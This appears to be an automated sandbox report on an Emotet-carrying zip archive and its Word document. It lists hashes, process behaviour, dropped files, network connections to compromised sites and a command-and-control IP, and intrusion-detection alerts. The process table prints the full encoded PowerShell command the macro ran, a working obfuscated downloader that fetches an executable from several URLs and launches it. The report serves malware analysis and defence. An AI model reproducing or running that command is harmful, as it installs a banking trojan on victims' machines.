analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

AttachFile_20201016144356.zip

Full analysis: https://app.any.run/tasks/ea079df7-55e4-4422-a470-2bc5e56c69a6
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 20, 2020, 12:34:50
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet-doc
emotet
loader
trojan
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

0ED43C44C4B9135B1B93965EA44A1D6A

SHA1:

A8197DA6274AB040B23F8166B8C711BD737F0CD9

SHA256:

19B83A37DA476F47B84461AEC592771CF37BE549608EC3FEC3FF87708F08C6BD

SSDEEP:

1536:5aA7LvCvQ5mn04VifyU086J1NUk3G2avXkW:qQgVtXJju2avd

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Qlrf9ve.exe (PID: 2520)
      • KBDINORI.exe (PID: 916)
    • Downloads executable files from the Internet

      • POwersheLL.exe (PID: 2556)
    • Connects to CnC server

      • KBDINORI.exe (PID: 916)
    • EMOTET was detected

      • KBDINORI.exe (PID: 916)
    • Changes the autorun value in the registry

      • KBDINORI.exe (PID: 916)
  • SUSPICIOUS

    • Executed via WMI

      • POwersheLL.exe (PID: 2556)
      • Qlrf9ve.exe (PID: 2520)
    • PowerShell script executed

      • POwersheLL.exe (PID: 2556)
    • Creates files in the user directory

      • POwersheLL.exe (PID: 2556)
    • Executable content was dropped or overwritten

      • POwersheLL.exe (PID: 2556)
      • Qlrf9ve.exe (PID: 2520)
    • Starts itself from another location

      • Qlrf9ve.exe (PID: 2520)
    • Connects to server without host name

      • KBDINORI.exe (PID: 916)
    • Reads Internet Cache Settings

      • KBDINORI.exe (PID: 916)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3988)
    • Manual execution by user

      • WINWORD.EXE (PID: 3988)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3988)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Deflated
ZipModifyDate: 2020:10:16 14:43:28
ZipCRC: 0xc41c5951
ZipCompressedSize: 67885
ZipUncompressedSize: 150943
ZipFileName: Informatii.doc
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
5
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winrar.exe no specs winword.exe no specs powershell.exe qlrf9ve.exe #EMOTET kbdinori.exe

Process information

PID
CMD
Path
Indicators
Parent process
2720"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\AttachFile_20201016144356.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
3988"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Informatii.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2556POwersheLL -ENCOD JABYAG8AcwA1AG4AYgBtAD0AKAAoACcAUQBnACcAKwAnADEAJwApACsAJwBxAGIAJwArACcAcAB3ACcAKQA7ACQARwA1AGoAZAAyAHIAdwA9ACQAVQBkADEAMQBvAGEAOQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQAgACsAIAAyADAAIAArACAAMQAwACAAKwAgADEAMAApACAAKwAgACQAQQB3AF8AMgA3AGYAbwA7ACQARwBuAGcAbgAwADQAcAA9ACgAJwBGACcAKwAoACcAMgBxACcAKwAnAGoAJwApACsAKAAnADYAJwArACcAdgBfACcAKQApADsAWwBzAHkAcwB0AGUAbQAuAGkAbwAuAGQAaQByAGUAYwB0AG8AcgB5AF0AOgA6ACIAYwBgAFIAZQBhAFQARQBgAGQAaQByAGAARQBDAHQAbwByAHkAIgAoACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAIAArACAAKAAoACcAewAwAH0AQwAnACsAKAAnAHUAMwBkACcAKwAnAHAAdgAnACkAKwAnAGIAJwArACcAewAnACsAJwAwAH0ARAA3ADQAYQA4AHEAJwArACcAdQB7ADAAfQAnACkAIAAtAGYAWwBjAGgAYQBSAF0AOQAyACkAKQA7ACQARwAxAGkANAAxADYAcwA9ACgAKAAnAEwANQAzACcAKwAnADMAJwApACsAJwBiACcAKwAnAHcAZwAnACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBlAGAAQwB1AHIAaQBgAFQAYAB5AFAAcgBPAFQAYABvAEMAYABPAGwAIgAgAD0AIAAoACgAJwBTACcAKwAnAHMAbAAnACkAKwAoACcAMwAsAFQAJwArACcAbABzACwAJwApACsAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMQAnACkAKwAnACwAJwArACcAVAAnACsAKAAnAGwAJwArACcAcwAxADIAJwApACkAOwAkAFUAOABoAHkAaQBpAGUAPQAoACcAUgAnACsAKAAnAHkAcwAnACsAJwB5AHUAJwApACsAJwB6ADUAJwApADsAJABHAGMAeABlAHcAeQBmACAAPQAgACgAJwBRAGwAJwArACgAJwByAGYAOQAnACsAJwB2ACcAKQArACcAZQAnACkAOwAkAFcAawA5AGUAYQB5AGEAPQAoACgAJwBPADAAcgA5ACcAKwAnAG4AJwApACsAJwBtACcAKwAnAHEAJwApADsAJABQAGkAZABiAG0ANgBtAD0AKAAnAFoAJwArACgAJwBsACcAKwAnAGYAMgAnACkAKwAoACcAZQBhACcAKwAnAHUAJwApACkAOwAkAE4AbwA3ADUAawBnAGQAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAwAH0AJwArACgAJwBDAHUAMwBkACcAKwAnAHAAJwApACsAJwB2AGIAJwArACcAewAwAH0ARAA3ACcAKwAoACcANAAnACsAJwBhADgAcQAnACkAKwAnAHUAewAwAH0AJwApAC0ARgAgAFsAQwBoAGEAUgBdADkAMgApACsAJABHAGMAeABlAHcAeQBmACsAKAAoACcALgBlACcAKwAnAHgAJwApACsAJwBlACcAKQA7ACQAVQA0ADMAMABsAF8AXwA9ACgAKAAnAFIANwBkAHcAaAAnACsAJwA3ACcAKQArACcAZAAnACkAOwAkAEkAeABqAG0AcAAzAGoAPQAmACgAJwBuAGUAdwAtACcAKwAnAG8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAG4AZQB0AC4AdwBlAEIAQwBsAEkARQBuAFQAOwAkAEIAXwAyADMANwBhAGYAPQAoACgAJwBoAHQAdABwADoAJwArACcALwAnACkAKwAoACcALwBqACcAKwAnAGEAcwBoACcAKQArACgAJwBtAHUAcwBpAGMALgAnACsAJwBjAG8AbQAnACsAJwAvACcAKwAnAHcAcAAtAGkAbgBjAGwAdQBkAGUAJwArACcAcwAvACcAKwAnAHUAZQBUACcAKQArACgAJwBtAGUAeAAnACsAJwAvACcAKwAnACoAaAAnACkAKwAoACcAdAAnACsAJwB0AHAAOgAnACkAKwAnAC8ALwAnACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGMAbwBuAHMAdQBsACcAKwAnAHQAJwArACcAbQB5AGEAZAB2AG8AJwArACcALgBjAG8AJwApACsAKAAnAG0AJwArACcALwBjAG8AJwApACsAJwBuACcAKwAnAHQAJwArACcAZQBuACcAKwAoACcAdAAvAEoAcgAnACsAJwA2ACcAKQArACgAJwAvACoAJwArACcAaAB0AHQAJwArACcAcAA6AC8ALwB0AGgAJwArACcAZQAnACkAKwAoACcAZAAnACsAJwBpAGIAYgBzACcAKwAnAGEAcABwACcAKwAnAC4AYwAnACkAKwAoACcAbwAnACsAJwBtAC8AJwApACsAKAAnAGIAYQBjAGsAdQAnACsAJwBwAC0AMQA0AC0AMQAwACcAKwAnAC0AMgAwADIAJwArACcAMAAnACkAKwAnAC8AJwArACcAeQBCACcAKwAoACcAVgAvACcAKwAnACoAaAB0AHQAcAAnACkAKwAnADoALwAnACsAJwAvAGMAJwArACgAJwBlAHMAdQAnACsAJwByAGwAYQAnACkAKwAoACcAcgBzAGUAYQByAGEAeQAuAGMAbwAnACsAJwBtAC8AJwArACcAdwBwAC0AJwArACcAYQAnACkAKwAnAGQAJwArACgAJwBtACcAKwAnAGkAJwArACcAbgAvAFIAdQBNACcAKQArACgAJwBwAGQAJwArACcATgAnACkAKwAnAEQAJwArACgAJwAvACoAaAB0AHQAcAA6ACcAKwAnAC8ALwBtACcAKwAnAGUAdAAnACsAJwBoAGkAbAAnACkAKwAoACcAaQBuACcAKwAnAGYAbwB0ACcAKwAnAGUAYwBoAC4AJwArACcAYwAnACsAJwBvAG0ALwAnACsAJwBtAGEAbAAnACkAKwAnAGkAZwAnACsAJwBhACcAKwAoACcALwAnACsAJwBPAEYAYgAnACkAKwAnAHIALwAnACsAJwAqACcAKwAoACcAaAB0ACcAKwAnAHQAcAA6ACcAKQArACgAJwAvAC8AYQBuAHQAaABvACcAKwAnAG4AJwArACcAeQBzAGEAJwArACcAcgBhAG4AZAByAGUAJwApACsAKAAnAGEALgAnACsAJwBjACcAKQArACgAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAKAAnAC0AYwBvAG4AdABlACcAKwAnAG4AdAAnACkAKwAnAC8AJwArACgAJwBHACcAKwAnAGUALwAnACkAKwAoACcAKgBoACcAKwAnAHQAdABwACcAKwAnADoALwAvACcAKQArACgAJwB1ACcAKwAnAHAAJwArACcAYwBsACcAKwAnAG8AdQBkAHcAZQBiAC4AJwApACsAJwBjAG8AJwArACgAJwBtAC8AYwBvACcAKwAnAG4AdABlAG4AdAAvACcAKwAnAEcAVgAnACkAKwAoACcASQAnACsAJwA3AC8AJwApACkALgAiAHMAUABsAGAASQB0ACIAKAAkAFcAcQB1AHoAcgBjAGMAIAArACAAJABHADUAagBkADIAcgB3ACAAKwAgACQAWQBnAGYAMQB0AGoAcwApADsAJABLAGsAZgB2AHUAcwAxAD0AKAAnAEcAYwAnACsAKAAnAG8AcgAnACsAJwAyADIAdAAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAUwA0AHEAXwBrAGwAdAAgAGkAbgAgACQAQgBfADIAMwA3AGEAZgApAHsAdAByAHkAewAkAEkAeABqAG0AcAAzAGoALgAiAGQAbwBXAE4AYABMAGAAbwBgAEEAZABmAEkATABlACIAKAAkAFMANABxAF8AawBsAHQALAAgACQATgBvADcANQBrAGcAZAApADsAJABGADYANwB5AHEANgAxAD0AKAAnAFMAMgAnACsAJwBhACcAKwAoACcAZQA2AGoAJwArACcAdAAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHAGUAJwArACcAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABOAG8ANwA1AGsAZwBkACkALgAiAGwAZQBuAEcAYABUAGgAIgAgAC0AZwBlACAAMgA4ADkAOAA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACcAdwBpACcAKwAnAG4AJwArACgAJwAzADIAJwArACcAXwBQAHIAJwArACcAbwBjACcAKQArACgAJwBlACcAKwAnAHMAcwAnACkAKQApAC4AIgBDAFIAZQBhAGAAVABlACIAKAAkAE4AbwA3ADUAawBnAGQAKQA7ACQATwBoADkAMgBzADEAbgA9ACgAJwBZACcAKwAoACcAcQBwACcAKwAnAHoAJwArACcAdwBrAGgAJwApACkAOwBiAHIAZQBhAGsAOwAkAEIAcgB5AG8ANQBlAHQAPQAoACcASwA2ACcAKwAnADUAcwAnACsAKAAnAHYAMwAnACsAJwBfACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABaAGMAaAB1AHcAbgAxAD0AKAAoACcATgAnACsAJwA5AHMAcAAnACkAKwAnAGsAYgAnACsAJwBlACcAKQA= C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2520C:\Users\admin\Cu3dpvb\D74a8qu\Qlrf9ve.exeC:\Users\admin\Cu3dpvb\D74a8qu\Qlrf9ve.exe
wmiprvse.exe
User:
admin
Company:
Steffen Lange
Integrity Level:
MEDIUM
Description:
Password Changer
Exit code:
0
Version:
1.0.0.1
916"C:\Users\admin\AppData\Local\msrepl40\KBDINORI.exe"C:\Users\admin\AppData\Local\msrepl40\KBDINORI.exe
Qlrf9ve.exe
User:
admin
Company:
Steffen Lange
Integrity Level:
MEDIUM
Description:
Password Changer
Version:
1.0.0.1
Total events
2 388
Read events
1 476
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
2
Unknown types
5

Dropped files

PID
Process
Filename
Type
2720WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb2720.14441\Informatii.doc
MD5:
SHA256:
3988WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9C.tmp.cvr
MD5:
SHA256:
2556POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JFSWMWNS0R6ZWJWV85V3.temp
MD5:
SHA256:
2556POwersheLL.exeC:\Users\admin\Cu3dpvb\D74a8qu\Qlrf9ve.exe
MD5:
SHA256:
3988WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:AF3344F72A36F5DA7F53516473855338
SHA256:DBB133BC83C14D512E087A9A8862438AE437CC463056F0DF9368F87284AA34FA
3988WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:45EF5ED5BA7C456BF7279B00DCC43DB8
SHA256:D5AC5E61065868E81CCB0CB3A260C8F8A9AB74BC8ACB623D7A577F56B3E5F97F
2520Qlrf9ve.exeC:\Users\admin\AppData\Local\msrepl40\KBDINORI.exeexecutable
MD5:9F1E91C3FAF940E244B27E2E06DAC739
SHA256:64DDE4FD3D4323F431A117D893AA75278EF8A988968747671F135E3C6B851158
2556POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:D6EE8C34E4C28999F00E385C8808E7DE
SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
2556POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2e10e8.TMPbinary
MD5:D6EE8C34E4C28999F00E385C8808E7DE
SHA256:39D598C410E9903C046FC3390F746643C2FDADA6A544E378311F5DC2EA26DFCB
3988WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Informatii.doc.LNKlnk
MD5:838138747C975E4E684016656CE008F6
SHA256:D645E07CA4B90BDBE9F9633264A9445217CFB3A2F6E8CE6C35F5CA076C8DE5C2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
6
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2556
POwersheLL.exe
GET
302
43.255.154.57:80
http://jashmusic.com/wp-includes/ueTmex/
SG
html
230 b
malicious
2556
POwersheLL.exe
GET
200
43.255.154.57:80
http://jashmusic.com/cgi-sys/suspendedpage.cgi
SG
html
7.44 Kb
malicious
2556
POwersheLL.exe
GET
404
107.180.51.103:80
http://thedibbsapp.com/backup-14-10-2020/yBV/
US
html
18.2 Kb
malicious
2556
POwersheLL.exe
GET
200
69.65.3.197:80
http://methilinfotech.com/maliga/OFbr/
US
executable
361 Kb
suspicious
916
KBDINORI.exe
POST
200
208.180.207.205:80
http://208.180.207.205/GsfglnDAH/5t7GrPxmoGOUxnLkJ/z90BT99tXM9kx2/qQPx/Bk73Vw4d6RDWMphknam/ZMPCBi1DESX/
US
binary
132 b
malicious
2556
POwersheLL.exe
GET
404
173.212.251.233:80
http://cesurlarsearay.com/wp-admin/RuMpdND/
DE
html
315 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2556
POwersheLL.exe
107.180.51.103:80
thedibbsapp.com
GoDaddy.com, LLC
US
malicious
2556
POwersheLL.exe
43.255.154.57:80
jashmusic.com
GoDaddy.com, LLC
SG
malicious
2556
POwersheLL.exe
160.153.138.219:80
www.consultmyadvo.com
GoDaddy.com, LLC
US
malicious
2556
POwersheLL.exe
173.212.251.233:80
cesurlarsearay.com
Contabo GmbH
DE
unknown
916
KBDINORI.exe
208.180.207.205:80
Suddenlink Communications
US
malicious
2556
POwersheLL.exe
69.65.3.197:80
methilinfotech.com
GigeNET
US
suspicious

DNS requests

Domain
IP
Reputation
jashmusic.com
  • 43.255.154.57
malicious
www.consultmyadvo.com
  • 160.153.138.219
malicious
thedibbsapp.com
  • 107.180.51.103
unknown
cesurlarsearay.com
  • 173.212.251.233
unknown
methilinfotech.com
  • 69.65.3.197
suspicious

Threats

PID
Process
Class
Message
2556
POwersheLL.exe
A Network Trojan was detected
ET POLICY Terse Named Filename EXE Download - Possibly Hostile
2556
POwersheLL.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2556
POwersheLL.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2556
POwersheLL.exe
Misc activity
ET INFO EXE - Served Attached HTTP
916
KBDINORI.exe
A Network Trojan was detected
ET CNC Feodo Tracker Reported CnC Server group 15
916
KBDINORI.exe
A Network Trojan was detected
MALWARE [PTsecurity] Emotet
2556
POwersheLL.exe
A Network Trojan was detected
ET POLICY Terse Named Filename EXE Download - Possibly Hostile
1 ETPRO signatures available at the full report
No debug info